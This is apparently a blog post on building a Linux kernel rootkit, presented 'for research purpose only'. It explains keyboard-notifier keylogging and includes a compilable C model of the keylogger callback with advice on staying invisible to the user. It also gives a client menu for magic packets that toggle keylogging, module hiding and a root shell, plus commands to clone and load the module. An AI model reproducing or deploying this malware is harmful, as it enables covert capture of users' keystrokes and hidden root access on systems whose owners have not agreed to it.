NOTICE : This POST for Research Purpose Only!
In the following we want to explore how to build a Linux kernel rootkit. As the definition of a rootkit states, it runs with root (kernel) privileges and should be hard for users to detect. To give the rootkit real value it has to do something. We decided to go with two very common use cases when it comes to
This section deals with keylogging in the Linux kernel. Keylogging describes the process of intercepting all key input from a keyboard. Our rootkit intercepts all keys and sends them to a server. The keylogging function can be activated and deactivated at runtime. To implement a keylogger in the Linux kernel you register a keyboard notifier with register_keyboard_notifier(): the kernel's console keyboard driver (drivers/tty/vt/keyboard.c) then calls your callback for every key event, with a struct keyboard_notifier_param that carries the keycode, the press/release state and the modifier (shift) state. Because the notifier sits in the console keyboard driver, it only sees keys that reach the virtual terminals: keys typed into an SSH session from another machine never pass through it, and an input device grabbed exclusively by a display server (EVIOCGRAB) may not deliver events to it either.
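The decoding step of such a callback, as an added example that is not code from the soad003/rootkit repository: the callback below has the same signature as the kernel's notifier_call, filters for KBD_KEYCODE press events, translates the keycode and shift state through a (constructed, partial) US keymap and appends the character to a buffer that the module would later ship to its server. The struct and the KBD_KEYCODE/NOTIFY_OK/KG_SHIFT constants are declared locally as mirrors of <linux/keyboard.h> and <linux/notifier.h> so the logic compiles and runs in userspace without kernel headers; the helper names keylog_set_enabled, keylog_reset, keylog_get and feed_key are assumptions for this example, not names from the project. In the real module the callback is wrapped in a struct notifier_block and handed to register_keyboard_notifier() from module_init (and removed with unregister_keyboard_notifier() in module_exit), and the buffer would be kernel memory drained by a work item or socket code rather than a static array.

```c
/* Added example: userspace model of a keyboard-notifier keylogger callback.
 * Not code from the soad003/rootkit repository. In a kernel module the
 * callback is registered from module_init with
 *     static struct notifier_block nb = { .notifier_call = kbd_callback };
 *     register_keyboard_notifier(&nb);
 * and unregistered with unregister_keyboard_notifier(&nb) in module_exit.
 * The struct and constants below mirror <linux/keyboard.h> and
 * <linux/notifier.h> so the same callback logic runs without kernel headers. */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

struct notifier_block;                 /* opaque here; real type in <linux/notifier.h> */

/* The fields of struct keyboard_notifier_param that the callback uses. */
struct keyboard_notifier_param {
    int down;                          /* 1 = key press, 0 = key release */
    int shift;                         /* modifier bitmask, bit KG_SHIFT = shift held */
    unsigned int value;                /* raw keycode for KBD_KEYCODE events */
};

#define KBD_KEYCODE 0x0001             /* action passed for every raw keycode event */
#define KG_SHIFT    0                  /* bit number of the shift modifier */
#define NOTIFY_OK   0x0001             /* "handled, keep delivering" */

/* Constructed subset of the US layout, indexed by keycode: [0] plain, [1] shifted. */
static const char us_keymap[128][2] = {
    [2] = {'1','!'},  [3] = {'2','@'},  [4] = {'3','#'},  [5] = {'4','$'},
    [6] = {'5','%'},  [7] = {'6','^'},  [8] = {'7','&'},  [9] = {'8','*'},
    [10] = {'9','('}, [11] = {'0',')'}, [12] = {'-','_'}, [13] = {'=','+'},
    [15] = {'\t','\t'}, [28] = {'\n','\n'}, [57] = {' ',' '},
    [16] = {'q','Q'}, [17] = {'w','W'}, [18] = {'e','E'}, [19] = {'r','R'},
    [20] = {'t','T'}, [21] = {'y','Y'}, [22] = {'u','U'}, [23] = {'i','I'},
    [24] = {'o','O'}, [25] = {'p','P'},
    [30] = {'a','A'}, [31] = {'s','S'}, [32] = {'d','D'}, [33] = {'f','F'},
    [34] = {'g','G'}, [35] = {'h','H'}, [36] = {'j','J'}, [37] = {'k','K'},
    [38] = {'l','L'}, [39] = {';',':'}, [40] = {'\'','"'},
    [44] = {'z','Z'}, [45] = {'x','X'}, [46] = {'c','C'}, [47] = {'v','V'},
    [48] = {'b','B'}, [49] = {'n','N'}, [50] = {'m','M'}, [51] = {',','<'},
    [52] = {'.','>'}, [53] = {'/','?'},
};

static bool logging_enabled = false;   /* toggled by the client's "-a key" / "-d key" */
static char logbuf[256];               /* keystrokes waiting to be sent to the server */
static size_t loglen;

/* Same signature as notifier_block.notifier_call in the kernel. */
static int kbd_callback(struct notifier_block *nb, unsigned long action, void *data)
{
    struct keyboard_notifier_param *p = data;
    (void)nb;
    /* Only key presses, only the raw-keycode stage, only while enabled. */
    if (!logging_enabled || action != KBD_KEYCODE || !p->down)
        return NOTIFY_OK;
    if (p->value >= sizeof us_keymap / sizeof us_keymap[0])
        return NOTIFY_OK;              /* keycode outside the table */
    char c = us_keymap[p->value][(p->shift >> KG_SHIFT) & 1];
    if (c == '\0')
        return NOTIFY_OK;              /* unmapped key: modifiers, F-keys, ... */
    if (loglen < sizeof logbuf - 1) {  /* drop silently when full, never stall input */
        logbuf[loglen++] = c;
        logbuf[loglen] = '\0';
    }
    return NOTIFY_OK;                  /* never block the event: stay invisible */
}

void keylog_set_enabled(bool on) { logging_enabled = on; }
void keylog_reset(void) { loglen = 0; logbuf[0] = '\0'; }
const char *keylog_get(void) { return logbuf; }

/* Test driver: feed a press/release pair the way the console keyboard driver would. */
void feed_key(unsigned int keycode, bool shift_held)
{
    struct keyboard_notifier_param p = {
        .shift = shift_held ? 1 << KG_SHIFT : 0,
        .value = keycode,
    };
    p.down = 1;
    kbd_callback(NULL, KBD_KEYCODE, &p);
    p.down = 0;                        /* release: must not log a second character */
    kbd_callback(NULL, KBD_KEYCODE, &p);
}

int main(void)
{
    keylog_set_enabled(true);
    feed_key(35, true);   /* KEY_H with shift -> 'H' */
    feed_key(23, false);  /* KEY_I -> 'i' */
    feed_key(57, false);  /* KEY_SPACE */
    feed_key(2, false);   /* KEY_1 -> '1' */
    feed_key(2, true);    /* KEY_1 with shift -> '!' */
    printf("captured: \"%s\"\n", keylog_get());   /* captured: "Hi 1!" */
    return 0;
}
```

The release event is fed through the callback on purpose: a callback that forgets to check `down` logs every key twice, which is the most common bug in first attempts at this. Returning NOTIFY_OK rather than NOTIFY_STOP matters for stealth, since stopping the chain would swallow the keystroke and the user would notice immediately.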
Rootkit client menu:
usage: ./rootkit_client.py [-a key] [-d key] [-h <host>]
-a key sends a magic packet to the rootkit, activates the keylogger and listens for the captured keys
-d key sends a magic packet to the rootkit and deactivates the keylogger
-a hide sends a magic packet to the rootkit and activates module hiding
-d hide sends a magic packet to the rootkit and deactivates module hiding
-a root sends a magic packet to the rootkit and activates the root shell
-h <host> the IP of the host where the rootkit is running
git clone https://github.com/soad003/rootkit
insmod rootkt.ko (loads the module on the server)
rmmod rootkt.ko (unloads the module on the server)
Source : https://github.com/soad003